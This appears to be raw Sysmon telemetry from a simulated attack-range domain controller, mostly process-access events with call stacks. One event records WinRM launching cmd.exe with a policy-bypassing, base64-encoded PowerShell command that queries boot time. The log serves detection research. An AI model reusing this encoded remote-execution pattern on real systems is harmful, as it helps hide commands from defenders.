13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002946Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002945Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002944Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002943Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002942Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002941Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002940Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8575-5FCF-8700-000000009101}4692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002939Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-8575-5FCF-8500-000000009101}46164672C:\Windows\system32\WinrsHost.exe{10ACEC4A-8575-5FCF-8700-000000009101}4692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000002938Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.978{10ACEC4A-8575-5FCF-8700-000000009101}4692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8575-5FCF-22B3-050000000000}0x5b3220HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002937Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002936Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.971{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002934Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.955{10ACEC4A-8541-5FCF-1500-000000009101}13641688C:\Windows\system32\svchost.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002933Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.955{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002932Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8575-5FCF-8600-000000009101}46284648C:\Windows\system32\conhost.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002931Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002930Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002929Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002928Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002927Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002926Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:57.940{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 